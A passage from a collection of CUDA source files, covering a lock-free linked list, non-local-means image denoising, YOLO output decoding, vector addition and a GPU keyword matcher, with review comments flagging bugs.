    cudaFree(d_bc);
    cudaFree(d_reverse_stack);
    cudaFree(d_end_point);
    // BUG FIX: these arrays were allocated with new[]; the original freed
    // them with free(), which is undefined behaviour.
    delete[] E;
    delete[] V;
    delete[] d;
    delete[] sigma;
    delete[] delta;
    delete[] bc;
    return 0;
}
21,467
#include <stdio.h>
#include <cuda.h>

/* Singly linked list node, allocated on the device heap. */
struct node {
    int data;
    struct node *next;
};

/* Head of the lock-free list; lives in device global memory. */
__device__ struct node *head;

/*
 * Allocate one node on the device heap, tagged with the caller's global
 * thread id. Returns NULL when the device heap is exhausted.
 */
__device__ struct node *getNewNode()
{
    unsigned id = blockIdx.x * blockDim.x + threadIdx.x;
    struct node *newnode = (struct node *)malloc(sizeof(struct node));
    if (newnode) {
        newnode->data = id;
        newnode->next = NULL;
    }
    return newnode;
}

/*
 * Lock-free push: every thread prepends one node with an atomicCAS retry
 * loop on the list head (assumes 64-bit device pointers).
 */
__global__ void listAdd()
{
    struct node *myoldhead, *actualoldhead;
    struct node *newnode = getNewNode();
    if (!newnode)
        return;   // device heap exhausted; drop this insertion instead of crashing
    do {
        myoldhead = head;
        newnode->next = myoldhead;
        actualoldhead = (struct node *)atomicCAS(
            (unsigned long long *)&head,
            (unsigned long long)myoldhead,
            (unsigned long long)newnode);
    } while (actualoldhead != myoldhead);
}

/* Print a single node's payload. */
__device__ void listPrint(struct node *ptr)
{
    printf("%d ", ptr->data);
}

/* Walk and print the whole list with one thread, then report its length. */
__global__ void listPrint()
{
    int nnodes = 0;
    for (struct node *ptr = head; ptr; ptr = ptr->next, ++nnodes)
        listPrint(ptr);
    printf("\nNumber of nodes = %d\n", nnodes);
}

int main()
{
    /*
     * BUG FIX: the original called cudaMemset(&head, 0, ...). `head` is a
     * __device__ symbol, so its host-side address is not a valid device
     * pointer and the write never reached the device. Initialise the
     * symbol through the symbol-copy API instead.
     */
    struct node *null_head = NULL;
    cudaMemcpyToSymbol(head, &null_head, sizeof(struct node *));
    listAdd<<<4, 1024>>>();
    listPrint<<<1, 1>>>();   // same stream: runs after all listAdd blocks finish
    cudaDeviceSynchronize();
    return 0;
}
21,468
#include <stdio.h>
#include <cuda.h>
#include <cuda_runtime.h>
#include <curand_kernel.h>
#include <stdlib.h>
#include <math.h>
#include <sys/time.h>
#include <time.h>
#include <string.h>

#define PI 3.1415926536
#define e 2.718281828459
#define N 64*64                       // total pixel count (image assumed 64x64)
#define PATCH 3                       // patch side length
#define RADIUS (PATCH-1)/2            // patch half-width
#define THREADS_PER_BLOCK 64

/* Start a wall-clock timer (returns the current time of day). */
struct timeval tic(){
    struct timeval tv;
    gettimeofday(&tv,NULL);
    return tv;
}

/* One image patch: flat index of its centre pixel, the centre value, and
 * the patch pixels in a patchSizeH x patchSizeW array (column-major-ish,
 * indexed patchSizeH*w+h below). */
typedef struct Patches {
    int index;
    float central;
    float* patchArray;
}Patch;

/* Stop the timer started by tic(); returns elapsed seconds. */
double toc(struct timeval begin){
    struct timeval end;
    gettimeofday(&end,NULL);
    double stime = ((double)(end.tv_sec-begin.tv_sec)*1000)+((double)(end.tv_usec-begin.tv_usec)/1000);
    stime = stime / 1000;
    return (stime);
}

/* Read an n x m comma-separated float matrix from file_path into a newly
 * malloc'd buffer. Exits on open failure.
 * NOTE(review): elements are stored at I[n*i+j], i.e. with row stride n
 * rather than m — only correct for square images (n == m); confirm. */
float* readFile(int n, int m, char *file_path){
    FILE* ptrFile = fopen(file_path, "r");
    float *I = (float*)malloc(n*m*sizeof(float));
    if (!ptrFile){
        printf("Error Reading File\n");
        exit (0);
    }
    for(int i=0; i<n; i++){
        for(int j=0; j<m; j++){
            fscanf(ptrFile,"%f,", &I[n*i+j]);
        }
    }
    fclose(ptrFile);
    return I;
}

/* Write an n x m float array to a comma-separated text file.
 * NOTE(review): the newline fprintf passes an extra argument
 * (array[n*i]) with a "\n" format string — harmless but should be
 * fprintf(fp,"\n"). */
void toTXT(float* array,char *output, int n, int m){
    FILE *fp;
    fp=fopen(output,"w");
    for(int i=0; i<n; i++){
        for(int j=0; j<m; j++){
            if(j<m-1){
                fprintf(fp,"%lf,",array[n*i+j]);
            }else if(j==m-1){
                fprintf(fp,"%lf",array[n*i+j]);
            }
        }
        fprintf(fp,"\n",array[n*i]);
    }
    fclose(fp);
    printf("File %s saved.\n", output);
}

/* Min-max normalisation kernel: B[i] = (A[i] - min) / max for all N pixels.
 * `max` is the range (max of A[i]-min), computed on the host. */
__global__ void normalization(float* A, float* B, float min, float max){
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if(i<N)
        B[i] = (A[i] - min) / max;
}

/* Generates one additive white Gaussian noise sample (Box-Muller) with
 * zero mean, scaled by dev (std dev ~ 0.0316, i.e. variance 0.01).
 * Source: https://www.embeddedrelated.com/showcode/311.php */
float AWGN_generator()
{
    float dev = 0.03162;   // var = 0.01
    float temp1;
    float temp2;
    float result;
    int p = 1;
    // Draw temp2 uniform in (0,1]; reject exactly 0 so log() is defined.
    while( p > 0 )
    {
        temp2 = ( rand() / ( (float)RAND_MAX ) );
        if ( temp2 == 0 )
        {
            p = 1;
        }
        else
        {
            p = -1;
        }
    }
    temp1 = cos( ( 2.0 * (float)PI ) * rand() / ( (float)RAND_MAX ) );
    result = sqrt( -2.0 * log( temp2 ) ) * temp1;   // Box-Muller transform
    return result * dev;
}

/* Build the per-pixel patches for image J (n x m) into allPatches.
 * Border patches are zero-padded. For speed, each patch is derived from
 * its left/upper neighbour's patch (shifted by one row/column) instead of
 * being re-gathered from J; only the newly exposed row/column is read
 * from J. mdH/mdW are the patch half-heights/half-widths. */
Patch* makePatches(float* J, int n, int m, Patch* allPatches, int patchSizeH, int patchSizeW){
    int mdW = (patchSizeW - 1)/2;
    int mdH = (patchSizeH - 1)/2;
    for(int i=0; i<n; i++){
        for(int j=0; j<m; j++){
            // Clear the patch, then record centre value and flat index.
            for(int w=0; w<patchSizeW; w++){
                for(int h=0; h<patchSizeH; h++){
                    allPatches[n*j+i].patchArray[patchSizeH*w+h] = 0;
                }
            }
            allPatches[n*j+i].central = J[n*j+i];
            allPatches[n*j+i].index = n*j+i;
            if(i==0 && j==0){
                // Top-left corner: gather the valid quadrant directly from J.
                for(int w=mdW; w<patchSizeW; w++){
                    for(int h=mdH; h<patchSizeH; h++){
                        allPatches[n*j+i].patchArray[patchSizeH*w+h] = J[(n*j+i)-(mdW-w)*n-(mdH-h)];
                    }
                }
            }else if(i>0 && j==0){
                // First column: shift the patch above up by one row...
                for(int h=0; h<patchSizeH-1; h++){
                    for(int w=0; w<patchSizeW; w++){
                        allPatches[n*j+i].patchArray[patchSizeH*w+h] = allPatches[n*j+(i-1)].patchArray[patchSizeH*w+(h+1)];
                    }
                }
                // ...and fill in the newly exposed bottom row (or zeros at the border).
                for(int w=mdW; w<patchSizeW; w++){
                    if((n-1-i) >= mdH){
                        allPatches[n*j+i].patchArray[patchSizeH*w+(patchSizeH-1)] = J[(n*j+i)-(mdW-w)*n+mdH];
                    }else if((n-1-i) < mdH){
                        allPatches[n*j+i].patchArray[patchSizeH*w+(patchSizeH-1)] = 0;
                    }
                }
            }else if(j>0){
                // Interior columns: shift the left neighbour's patch left by one column...
                for(int w=0; w<patchSizeW-1; w++){
                    for(int h=0; h<patchSizeH; h++){
                        allPatches[n*j+i].patchArray[patchSizeH*w+h] = allPatches[n*(j-1)+i].patchArray[patchSizeH*(w+1)+h];
                    }
                }
                // ...and compute the valid vertical extent [a,b) of the new rightmost column.
                int a,b;
                if(i>=mdH && (n-1-i)>=mdH){
                    a = 0;
                    b = patchSizeH;
                }else if(i<mdH && (n-1-i)>=mdH){
                    a = mdH - i;
                    b = patchSizeH;
                }else if(i<mdH && (n-1-i)<mdH){
                    a = mdH - i;
                    b = mdH + (n-i);
                }else if(i>=mdH && (n-1-i)<mdH){
                    a = 0;
                    b = mdH + (n-i);
                }
                for(int h=a; h<b; h++){
                    if((m-1-j) >= mdW){
                        allPatches[n*j+i].patchArray[patchSizeH*(patchSizeW-1)+h] = J[(n*j+i)+mdW*n-(mdH-h)];
                    }else if((m-1-j) < mdW){
                        allPatches[n*j+i].patchArray[patchSizeH*(patchSizeW-1)+h] = 0;
                    }
                }
            }
        }
    }
    return allPatches;
}

/* Compute a (patchSizeH x patchSizeW) Gaussian weighting window with
 * std dev patchSigma, centred in the window. `max` is unused. */
float* computeG_a(int patchSizeH, int patchSizeW, float patchSigma){
    float* gauss = (float*)malloc(patchSizeH*patchSizeW*sizeof(float));
    float max = -1.0;
    for (int i = 0; i < patchSizeH; i++) {
        for (int j = 0; j < patchSizeW; j++) {
            float y = i - (patchSizeH - 1) / 2.0;
            float x = j - (patchSizeW - 1) / 2.0;
            gauss[patchSizeW*i+j] = (1/2.0) * exp(-(x * x + y * y) / (2.0 * PI * patchSigma * patchSigma));
        }
    }
    return gauss;
}

/* Kernel: compute the NLM weight W[k] = exp(-d^2/filtSigma) between the
 * reference patch p_i (pixel i) and every pixel k's patch, where d is
 * the Gauss-weighted patch distance. A is the zero-padded image
 * (row stride sizeofRow); each block stages its slice of A plus a RADIUS
 * halo into dynamic shared memory sh_A. V is the Gaussian window, copied
 * by every thread into sh_gauss (redundant but race-free: same values).
 * NOTE(review): d_o is declared but never used; there is also no
 * __syncthreads() after the sh_gauss copy (safe only because every
 * thread writes all of sh_gauss itself before the barrier below). */
__global__ void dist(float *W,float *p_i, int i, float *A, float *V, int n, int patchSizeH, float filtSigma){
    float d=0;
    int sizeofRow = n + 2*RADIUS;
    int k = blockIdx.x * blockDim.x + threadIdx.x;
    int index = threadIdx.x;
    __shared__ float d_o;
    __shared__ float sh_gauss[PATCH*PATCH];
    extern __shared__ float sh_A[];
    for(int v=0; v<patchSizeH*patchSizeH; v++){
        sh_gauss[v] = V[v];
    }
    // Coordinates of this thread's pixel inside the padded image A.
    int x = k/n + RADIUS;
    int y = k%n + RADIUS;
    int indexX = index/n;
    int indexY = index%n;
    if(k<N){
        // Centre element, then halo rows/columns for edge threads.
        sh_A[sizeofRow*(RADIUS+indexX) + (RADIUS+indexY)] = A[sizeofRow*x+y];
        if(indexX<RADIUS && indexY<RADIUS){
            sh_A[sizeofRow*indexX + indexY] = A[sizeofRow*(x-RADIUS) + (y-RADIUS)];
            sh_A[sizeofRow*(indexX+RADIUS+1) + (RADIUS+n+ indexY)] = A[sizeofRow*(x+n) + (y+n)];
        }else if(indexY<RADIUS){
            sh_A[sizeofRow*(indexX+RADIUS) + indexY] = A[sizeofRow*x + (y-RADIUS)];
            sh_A[sizeofRow*indexX + (indexY+n)] = A[sizeofRow*x + (y+n)];
        }else if(indexX<RADIUS){
            sh_A[sizeofRow*indexX + (indexY+RADIUS)] = A[sizeofRow*(x-RADIUS) + y];
            sh_A[sizeofRow*(indexX+RADIUS+1) + (indexY+RADIUS)] = A[sizeofRow*(x+n) + y];
        }
    }
    __syncthreads();
    if(i/THREADS_PER_BLOCK == blockIdx.x){
        // Reference pixel i lives in this block: read its patch from shared memory.
        int thr = i%THREADS_PER_BLOCK;
        // The coordinates of i in the block.
        int x = thr/n;
        int y = thr%n;
        for (int r = 0; r < patchSizeH; r++) {
            for(int c=0; c<patchSizeH; c++){
                d += sh_gauss[patchSizeH*r+c] * powf(sh_A[(x*n+y)+n*r+c] - sh_A[(indexX*n+indexY)+n*r+c],2);
            }
        }
    }else{
        // Otherwise use the reference patch passed in from the host.
        for (int r = 0; r < patchSizeH; r++) {
            for(int c=0; c<patchSizeH; c++){
                d += sh_gauss[patchSizeH*r+c] * powf(p_i[n*r+c] - sh_A[(indexX*n+indexY)+n*r+c],2);
            }
        }
    }
    d = sqrt(d);
    W[k] = exp(-pow(d,2) / filtSigma);
    d=0;
}

/* Kernel: normalise the weight row w[] by the scalar *z (the row sum Z[i]). */
__global__ void dim(float *w, float *z){
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if(i<N){
        w[i] = w[i] / *z;
    }
}

/* Non-local-means pipeline: read image, normalise on the GPU, add AWGN,
 * build patches, compute the full NxN weight matrix with the dist kernel,
 * normalise each weight row, and form the filtered image If as a weighted
 * average of noisy pixels. Writes norm/J/If/Dif text files.
 * Usage: prog n m patchSizeH patchSizeW input_file */
int main(int argc, char *argv[]){
    int n = atoi(argv[1]);
    int m = atoi(argv[2]);
    int patchSizeH = atoi(argv[3]);
    int patchSizeW = atoi(argv[4]);
    // NOTE(review): 5/3 is integer division, so patchSigma == 1.0f here;
    // likely intended 5.0f/3.0f — confirm against the reference
    // implementation before changing.
    float patchSigma =5/3;
    float filtSigma =0.01 ;
    char* file_path;
    // NOTE(review): allocation is strlen bytes with no room for the NUL
    // terminator, and memcpy does not copy one; fopen() later reads an
    // unterminated string. Should be malloc(strlen+1) + strcpy.
    file_path=(char*)malloc(strlen(argv[5])*sizeof(char));
    memcpy(file_path,argv[5],strlen(argv[5]));
    int size = N * sizeof(float);
    int sizePatch = patchSizeH * patchSizeW * sizeof(float);
    int pSize = patchSizeH * patchSizeW;
    int s = n+(patchSizeH-1);       // padded image side
    int sA = s*s;
    float *I, *I_norm, *J, *If;
    float *dev_I, *dev_I_norm, *dev_J, *dev_gauss;
    float *P, *w;
    float *A = (float*)malloc(sA*sizeof(float));
    // Allocate memory for device copies.
    cudaMalloc(&dev_I, size);
    cudaMalloc(&dev_I_norm, size);
    cudaMalloc(&dev_J, size);
    cudaMalloc(&dev_gauss, sizePatch);
    I = (float*)malloc(size);
    I_norm = (float*)malloc(size);
    J = (float*)malloc(size);
    // NOTE(review): If (and Z below) come from malloc and are accumulated
    // into with += without being zeroed first — reads of uninitialised
    // memory; should be calloc or an explicit memset.
    If = (float*)malloc(size);
    Patch* allPatches;
    allPatches = (Patch*)malloc(n*m*sizeof(Patch));
    for(int i=0; i<n; i++){
        for(int j=0; j<m; j++){
            allPatches[n*j+i].patchArray = (float*)malloc(patchSizeH*patchSizeW*sizeof(float));
        }
    }
    w = (float*)malloc(N*N*sizeof(float));
    float* gauss = (float*)malloc(sizePatch);
    float* Z = (float*)malloc(size);
    struct timeval tStart;
    I = readFile(n,m,file_path);
    // Find min of I and the range max of (I - min) for normalisation.
    float min = INFINITY;
    float max = -1.0;
    for(int i=0; i<n; i++){
        for(int j=0; j<m; j++){
            if(I[n*i+j]<min) min= I[n*i+j];
        }
    }
    for(int i=0; i<n*m; i++){
        if((I[i]-min)>max) max = I[i]-min;
    }
    cudaMemcpy(dev_I, I, size, cudaMemcpyHostToDevice);
    normalization<<<N/THREADS_PER_BLOCK,THREADS_PER_BLOCK>>>(dev_I, dev_I_norm, min, max);
    cudaMemcpy(I_norm, dev_I_norm, size, cudaMemcpyDeviceToHost);
    // J = normalised image + additive white Gaussian noise.
    for(int i=0; i<n*m; i++){
        J[i] = I_norm[i] + AWGN_generator();
    }
    toTXT(I_norm,"normShared.txt",n,m);
    toTXT(J,"JShared.txt",n,m);
    // A : extended J array with zeros all around.
    for(int i=0; i<s; i++){
        for(int j=0; j<(patchSizeH-1)/2; j++){
            A[s*j+i] = 0;
        }
        for(int j=0; j<(patchSizeH-1)/2; j++){
            A[s*(n+(patchSizeH-1)/2)*j+i] = 0;
        }
        for(int j=0; j<(patchSizeH-1)/2; j++){
            A[((patchSizeH-1)/2)*i+j] = 0;
        }
        for(int j=n+(patchSizeH-1)/2; j<s;j++){
            A[((patchSizeH-1)/2)*i+j] = 0;
        }
    }
    for(int i=0; i<n; i++){
        for(int j=0; j<n; j++){
            A[((patchSizeH-1)/2)*s+s*i+(patchSizeH-1)/2+j] = J[n*i+j];
        }
    }
    allPatches = makePatches(J,n,m,allPatches,patchSizeH,patchSizeW);
    // Flatten patches into P (one pSize row per pixel).
    P = (float*)malloc(N*pSize*sizeof(float));
    for(int i=0; i<N; i++){
        for(int j=0; j<pSize; j++){
            P[pSize*i+j] = allPatches[i].patchArray[j];
        }
    }
    float *dev_A;
    cudaMalloc(&dev_A, sA*sizeof(float));
    cudaMemcpy(dev_A, A, sA*sizeof(float), cudaMemcpyHostToDevice);
    gauss = computeG_a(patchSizeH, patchSizeW, patchSigma);
    cudaMemcpy(dev_gauss, gauss, sizePatch, cudaMemcpyHostToDevice);
    float *patch_i = (float*)malloc(sizePatch);
    float *dev_patchI;
    cudaMalloc(&dev_patchI, sizePatch);
    float *wi_j = (float*)malloc(N*sizeof(float));
    float *dev_wij;
    cudaMalloc(&dev_wij, N*sizeof(float));
    tStart = tic();
    // For each pixel i: upload its reference patch, compute one weight row,
    // accumulate the row sum Z[i].
    for(int i=0; i<N; i++){
        for(int j=0; j<pSize; j++){
            patch_i[j] = P[pSize*i +j];
        }
        cudaMemcpy(dev_patchI, patch_i, sizePatch, cudaMemcpyHostToDevice);
        size_t size_shared = s*patchSizeH*sizeof(float);
        dist<<<N/THREADS_PER_BLOCK,THREADS_PER_BLOCK,size_shared>>>(dev_wij, dev_patchI,i,dev_A, dev_gauss,n,patchSizeH,filtSigma);
        cudaMemcpy(wi_j, dev_wij, size, cudaMemcpyDeviceToHost);
        for(int j=0; j<N;j++){
            Z[i] += wi_j[j];
            w[N*i+j] = wi_j[j];
        }
    }
    double time = toc(tStart);
    float *dev_Z;
    cudaMalloc(&dev_Z, sizeof(float));
    // Normalise each weight row by Z[i] on the GPU and form the filtered
    // image If[i] = sum_j w[i][j] * J[j].
    for(int i=0; i<N; i++){
        for(int j=0; j<N;j++){
            wi_j[j] = w[N*i+j];
        }
        cudaMemcpy(dev_wij, wi_j,size, cudaMemcpyHostToDevice);
        cudaMemcpy(dev_Z, &Z[i], sizeof(float), cudaMemcpyHostToDevice);
        dim<<<N/THREADS_PER_BLOCK,THREADS_PER_BLOCK>>>(dev_wij,dev_Z);
        cudaMemcpy(wi_j, dev_wij, size,cudaMemcpyDeviceToHost);
        for(int j=0; j<N;j++){
            w[N*i+j] = wi_j[j];
            If[i] += w[N*i+j] * J[j];
        }
    }
    toTXT(If,"IfShared.txt",n,m);
    // Residual between filtered and noisy image.
    float* Dif = (float*)malloc(N*sizeof(float));
    for(int i=0; i<N; i++){
        Dif[i] =If[i] - J[i] ;
    }
    toTXT(Dif,"DifShared.txt",n,m);
    printf("Time: %f sec", time);
    cudaFree(dev_I);
    cudaFree(dev_I_norm);
    cudaFree(dev_J);
    cudaFree(dev_gauss);
    cudaFree(dev_patchI);
    cudaFree(dev_wij);
    cudaFree(dev_A);
    free(I);
    free(I_norm);
    free(J);
    free(patch_i);
    free(gauss);
    free(wi_j);
    free(Z);
    free(If);
    free(A);
    return 0;
}
21,469
#include "includes.h"

/* Logistic sigmoid: 1 / (1 + e^-x). */
__device__ float sigmoid(float data){
    return 1./(1. + expf(-data));
};

/*
 * Decode raw YOLO feature-map activations into detection candidates.
 *
 * One thread per (batch, anchor, cell) triple; n is the total number of
 * such triples. `input` holds the activations in NCHW layout with C =
 * anchor_num*(classes+5) channels per batch; `anchors` holds anchor_num
 * (w,h) pairs, staged into dynamic shared memory. Cells whose objectness
 * (sigmoid of channel 4) exceeds `thresh` and whose best class score
 * (sigmoid(class)*objectness) also exceeds it append one 7-float record
 * to `output`: output[0] is an atomically-incremented detection counter,
 * followed by [cx, cy, w, h, class_id, confidence, batch_id] per record.
 * Box centre is scaled by down_stride; w/h use exp(activation)*anchor.
 *
 * NOTE(review): the `if(idx >= n) return;` before __syncthreads() means a
 * partially out-of-range block reaches the barrier with fewer threads
 * than loaded it — undefined behaviour when n is not a multiple of
 * blockDim.x; the guard should instead skip the work, not the barrier.
 * NOTE(review): atomicAdd on a float counter reinterpreted as a record
 * count assumes the caller zeroed output[0]; exact only while the count
 * stays within float's integer-exact range (< 2^24).
 */
__global__ void yoloKernel(const int n,const float * input, float* output, const int* anchors,int anchor_num, int classes,int height,int width,float down_stride,float thresh){
    const int idx = blockIdx.x * blockDim.x + threadIdx.x;
    if(idx >= n)
        return;
    // Stage the anchor (w,h) pairs into shared memory.
    extern __shared__ int shared_anchors[];
    if(threadIdx.x < anchor_num*2){
        shared_anchors[threadIdx.x] = anchors[threadIdx.x];
    }
    __syncthreads();
    // Unpack idx -> (row, col, anchor, batch).
    int row = idx % width;
    int col = (idx / width) % height;
    int anchor_id = (idx / width / height)% anchor_num;
    int batch_id = idx/width/height/anchor_num;
    int C = anchor_num*(classes+5);    // channels per batch
    int stride = width*height;         // one channel plane
    // Offset of channel 0 for this (batch, anchor, cell).
    int begin_id = ((batch_id * C + anchor_id*(classes + 5))*height+col)*width+row;
    // Channel 4 is the objectness logit.
    float conf_prob =sigmoid(input[begin_id + 4*stride]);
    if(conf_prob > thresh) {
        // Pick the best class whose combined score clears the threshold.
        int class_id = -1;
        float max_prob = thresh;
        for (int c = 0;c<classes;++c){
            int cls_id = begin_id + stride*(c + 5);
            float cls_prob = sigmoid(input[cls_id]) *conf_prob ;
            if(cls_prob > max_prob){
                max_prob = cls_prob;
                class_id = c;
            }
        }
        if(class_id >= 0){
            // Reserve a slot and write the 7-float detection record.
            int resCount = (int)atomicAdd(output,1);
            float * data = output + 1 + resCount*7;   // x1,y1,x2,y2,cls,conf,batch_id
            data[0] = (row + sigmoid(input[begin_id]))*down_stride;
            data[1] = (col + sigmoid(input[begin_id+stride]))*down_stride;
            data[2] = expf(input[begin_id+2*stride]) * (float)shared_anchors[2*anchor_id];
            data[3] = expf(input[begin_id+3*stride]) * (float)shared_anchors[2*anchor_id + 1];
            data[4] = class_id;
            data[5] = max_prob;
            data[6] = batch_id;
        }
    }
}
21,470
#include "includes.h"

/*
 * Element-wise vector addition: c[i] = a[i] + b[i] for every i in [0, N).
 *
 * Implemented as a grid-stride loop, so any launch configuration covers
 * the whole vector: each thread starts at its unique global index and
 * advances by the total number of launched threads (blockDim.x *
 * gridDim.x) until it runs off the end. This keeps the kernel correct
 * even when N exceeds the maximum grid capacity (~8M elements with
 * 65535 blocks of 512 threads), and no two threads ever touch the same
 * element.
 */
__global__ void add(int *a, int *b, int *c)
{
    const int stride = blockDim.x * gridDim.x;
    for (int i = threadIdx.x + blockIdx.x * blockDim.x; i < N; i += stride)
        c[i] = a[i] + b[i];
}
21,471
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <math.h>
#include <ctime>

// Includes CUDA
#include <cuda_runtime.h>

#define LINEWIDTH 20
#define NWORDS 32
#define CUDA_STREAMS 1
#define BLOCK_SIZE 32
#define TITLE_SIZE 4

int length;                        // text length in characters
int len;                           // text length in 32-bit words
int nwords;                        // number of keywords (== NWORDS)
int matches[NWORDS];               // CPU reference match counts
char *ctext;                       // raw text buffer (length+4 bytes, space padded, NOT NUL-terminated)
char keywords[NWORDS][LINEWIDTH];  // 4-character keywords, NUL-terminated
unsigned int *text;                // word-aliased view of ctext
unsigned int *words;               // keywords packed into 32-bit little-endian words
float cpuRunTime;

// citation: https://stackoverflow.com/questions/14038589/what-is-the-canonical-way-to-check-for-errors-using-the-cuda-runtime-api
#define checkCudaErrors(ans) { gpuAssert((ans), __FILE__, __LINE__); }
inline void gpuAssert(cudaError_t code, const char *file, int line, bool abort=true)
{
    if (code != cudaSuccess)
    {
        fprintf(stderr,"GPUassert: %s %s %d\n", cudaGetErrorString(code), file, line);
        if (abort) exit(code);
    }
}

/*
 * Load the keyword list and the input text file into the module globals.
 * Safe to call repeatedly (main calls it once per data file).
 */
void intialise(char *input)
{
    nwords = NWORDS;
    printf("-----------\nGoint to read %s\n", input);

    // FIX: release buffers from any previous call so repeated
    // initialisation does not leak (globals start out NULL; free(NULL)
    // is a no-op on the first call).
    free(ctext);
    free(words);
    ctext = NULL;
    words = NULL;

    char *line;
    line = (char*) malloc(sizeof(char)*LINEWIDTH);
    memset(matches, 0, sizeof(matches));

    // Read in keywords for processing.
    FILE *fp, *wfile;
    wfile = fopen("./data/keywords.txt","r");
    if (!wfile) { printf("keywords.txt: File not found.\n"); exit(0);}

    int k=0, cnt = nwords;
    ssize_t read;                       // FIX: getline returns ssize_t; -1 compare was on size_t
    size_t linelen = LINEWIDTH;
    while((read = getline(&line, &linelen, wfile)) != -1 && cnt--)
    {
        // FIX: the original passed sizeof(line) — the size of a pointer,
        // not of the buffer. Copy up to the keyword slot size instead.
        strncpy(keywords[k], line, LINEWIDTH - 1);
        keywords[k][4] = '\0';          // keywords are exactly 4 characters
        k++;
    }
    fclose(wfile);
    free(line);                         // FIX: getline's buffer was leaked

    // Read the text and pad it with 4 trailing spaces so the kernel/CPU
    // matcher can always read one word past the end.
    fp = fopen(input,"r");
    if (!fp) { printf("Unable to open the file.\n"); exit(0);}
    length = 0;
    while (getc(fp) != EOF) length++;
    ctext = (char *)malloc(length+4);
    rewind(fp);
    for (int l=0; l<length; l++) ctext[l] = getc(fp);
    for (int l=length; l<length+4; l++) ctext[l] = ' ';
    fclose(fp);
    printf("Length : %d\n", length );

    // Define number of words of text, and set pointers.
    len = length/4;
    text = (unsigned int *) ctext;

    // Pack each 4-character keyword into one little-endian 32-bit word.
    words = (unsigned int *)malloc(nwords*sizeof(unsigned int));
    for (int w=0; w<nwords; w++)
    {
        words[w] = ((unsigned int) keywords[w][0])
                 + ((unsigned int) keywords[w][1])*(1<<8)
                 + ((unsigned int) keywords[w][2])*(1<<16)
                 + ((unsigned int) keywords[w][3])*(1<<24);
    }
}

/* Release the module-global buffers. text aliases ctext, so free once. */
void deinit(){
    free(words);
    free(text);
    words = NULL;
    ctext = NULL;
    text = NULL;
}

/* Compare GPU match counts against the CPU reference in `matches`. */
void check_matches(int *temp_matches){
    bool isRight = true;
    for(int i = 0; i<nwords; i++)
    {
        if(matches[i] != temp_matches[i])
        {
            isRight = false;
            printf("WRONG OUTPUT:\t %s\t|\t%d\n", keywords[i], temp_matches[i]);
        }
    }
    if(isRight)
    {
        printf(" - Correct Answer -\n");
    }
}

/* Print the per-keyword match counts in a table. */
void print_matches(int *temp_matches){
    printf("Printing Matches:\n");
    printf("Word\t |\tNumber of Matches\n===================================\n");
    for (int i = 0; i < nwords; ++i)
        printf("%s\t |\t%d\n", keywords[i], temp_matches[i]);
}

/*
 * CPU reference matcher: for every word position and every byte offset
 * 0..3, assemble the 4-byte window and count equality against each
 * keyword. Reads text[l+1] at the last position — covered by the 4
 * padding bytes appended in intialise().
 */
void matchPattern_CPU(unsigned int *text, unsigned int *words, int *matches, int nwords, int length)
{
    unsigned int word;
    for (int l=0; l<length; l++)
    {
        for (int offset=0; offset<4; offset++)
        {
            if (offset==0)
                word = text[l];
            else
                word = (text[l]>>(8*offset)) + (text[l+1]<<(32-8*offset));
            for (int w=0; w<nwords; w++)
            {
                matches[w] += (word==words[w]);
            }
        }
    }
}

/* Run the CPU matcher and record its runtime for the speedup report. */
void exec_CPU(){
    const clock_t begin_time = clock();
    matchPattern_CPU(text, words, matches, nwords, len);
    cpuRunTime = (float)( clock() - begin_time ) / CLOCKS_PER_SEC;
    printf("CPU exec time: %f s\n\n", cpuRunTime);
}

/*
 * GPU matcher. Each block has NWORDS threads; thread tid owns keyword
 * words[tid]. The block stages TITLE_SIZE strided tiles of NWORDS text
 * words (plus one halo word per tile) into shared memory, then every
 * thread scans all staged words at the four byte offsets and adds its
 * hit count to matches[tid] with one atomicAdd.
 *
 * NOTE(review): the halo load text[... + blockDim.x] can read past the
 * end of the buffer for the last tile of the last block when len is not
 * a multiple of TITLE_SIZE*NWORDS; the 4-byte padding covers only one
 * extra word. Worth bounding-checking if inputs vary.
 */
__global__ void matchPattern_gpu_1(const unsigned int *text, const unsigned int *words, int *matches, int nwords, int length)
{
    int tid = threadIdx.x;
    int idx = blockIdx.x * blockDim.x + tid;

    // Staged text: TITLE_SIZE tiles of NWORDS words, each followed by one halo word.
    __shared__ unsigned int text_s[(TITLE_SIZE*NWORDS) + TITLE_SIZE];
    #pragma unroll
    for(int x = 0; x<TITLE_SIZE; x++){
        text_s[tid + (x*NWORDS) + x] = text[idx+(x*blockDim.x*gridDim.x)];
        text_s[((x+1)*NWORDS) + x] = text[(x*blockDim.x*gridDim.x) + (blockIdx.x * blockDim.x) + blockDim.x];
    }

    // Each thread in a block is responsible for one keyword.
    unsigned int keyword = words[tid];
    __syncthreads();

    unsigned int word;
    int sum = 0;
    // Scan every staged word at all four byte offsets.
    #pragma unroll
    for(int x = 0; x<TITLE_SIZE; x ++)
    {
        #pragma unroll
        for(int w = (x*NWORDS) + x; w < ((x+1)*NWORDS) + (x); w++)
        {
            #pragma unroll
            for (int offset=0; offset<4; offset++)
            {
                word = offset==0 ? text_s[w] : (text_s[w]>>(8*offset)) + (text_s[w+1]<<(32-8*offset));
                sum = sum + (word==keyword);
            }
        }
    }
    atomicAdd(&matches[tid],sum);
}

/* Allocate device buffers, run the GPU matcher, time each phase and
 * verify the result against the CPU reference. */
void exec_gpu_simple(){
    unsigned int *d_text;
    unsigned int *d_words;
    int *d_matches;
    int *h_matches;

    h_matches = (int *)malloc(nwords*sizeof(int));
    checkCudaErrors(cudaMalloc((void**)&d_words, nwords*sizeof(unsigned int)));
    checkCudaErrors(cudaMalloc((void**)&d_matches, nwords*sizeof(int)));
    // FIX: size from the known length. ctext is not NUL-terminated, so the
    // original strlen(ctext) read past the end of the allocation (UB).
    checkCudaErrors(cudaMalloc((void**)&d_text, length + 4));

    // FIX: the kernel accumulates with atomicAdd, so the counters must
    // start at zero — cudaMalloc does not zero memory.
    checkCudaErrors(cudaMemset(d_matches, 0, nwords*sizeof(int)));

    cudaEvent_t start,stop;
    float time_H2D,time_D2H,time_kernel;
    checkCudaErrors(cudaEventCreate(&start));
    checkCudaErrors(cudaEventCreate(&stop));

    // MEMCOPY
    cudaEventRecord(start, 0);
    checkCudaErrors(cudaMemcpy(d_words, words, nwords*sizeof(unsigned int), cudaMemcpyHostToDevice));
    checkCudaErrors(cudaMemcpy(d_text, text, length + 4, cudaMemcpyHostToDevice));
